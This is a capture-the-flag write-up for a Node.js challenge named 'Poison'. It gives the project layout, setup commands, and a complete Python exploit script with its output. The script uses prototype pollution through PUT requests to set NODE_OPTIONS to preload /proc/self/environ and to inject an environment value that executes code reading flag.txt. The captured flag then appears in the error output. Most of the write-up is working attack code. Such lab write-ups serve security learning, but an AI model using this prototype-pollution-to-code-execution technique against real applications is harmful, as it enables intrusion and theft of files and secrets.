Poison

Project

Structure

poison
├── src/ 
│   ├── controllers/ 
│       ├── date.js 
│       └── services.js 
│   ├── data/ 
│       └── services.json 
│   ├── middlewares/ 
│       └── error.js 
│   ├── routes/ 
│       ├── date.json 
│       └── services.js 
│   └── utils/ 
│       └── utils.js 
│   ├── app.js 
│   ├── flag.txt 
│   └── package.json
├── .dockerignore
├── Dockerfile 
├── entrypoint.sh
└── restart.sh

Solution

Install pip

sudo apt install python3-pip

Install requests

python3 -m pip install requests

Exploit

from requests import get, put

host = '127.0.0.1'
port = '8003'

nodeOpt = {
    'url': f'http://{host}:{port}/api/tcc/constructor/prototype/NODE_OPTIONS',
    'payload': { 'value': '--require /proc/self/environ' }
}

shell = {
    'url': f'http://{host}:{port}/api/tcc/constructor/prototype/shell',
    'payload': { 'value': 'node' }
}

env = {
    'url': f'http://{host}:{port}/api/tcc/constructor/prototype/env',
    'payload': { 'value': { 'EXPLOIT': "'';throw new Error(require('fs').readFileSync('/usr/src/app/flag.txt'));//" } }
}


date = {
    'url': f'http://{host}:{port}/api/date'
}

put(nodeOpt['url'], json = nodeOpt['payload'])
put(shell['url'], json = shell['payload'])
put(env['url'], json = env['payload'])

response = get(date['url'])
print(response.text)

Run the script

python3 exploit.py

Output

EXPLOIT='';throw new Error(require('fs').readFileSync('/usr/src/app/flag.txt'));//                                        
           ^                                                                                                    
                                                                                                                
Error: TCC{j5_pR0707yp3_p0150n1Ng}                                                                              
    at Object.<anonymous> (/proc/30/environ:1:18)                                                               
    at Module._compile (internal/modules/cjs/loader.js:1085:14)              
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:1114:10)
    at Module.load (internal/modules/cjs/loader.js:950:32)           
    at Function.Module._load (internal/modules/cjs/loader.js:790:12)        
    at Module.require (internal/modules/cjs/loader.js:974:19)                                                          
    at Module._preloadModules (internal/modules/cjs/loader.js:1244:12)                                                 
    at loadPreloadModules (internal/bootstrap/pre_execution.js:475:5)                                                                                                                                                            
    at prepareMainThreadExecution (internal/bootstrap/pre_execution.js:72:3)                                              
    at internal/main/check_syntax.js:24:1

PreviousExtend NextBlackhat MEA 2022

Last updated 4 years ago

Was this helpful?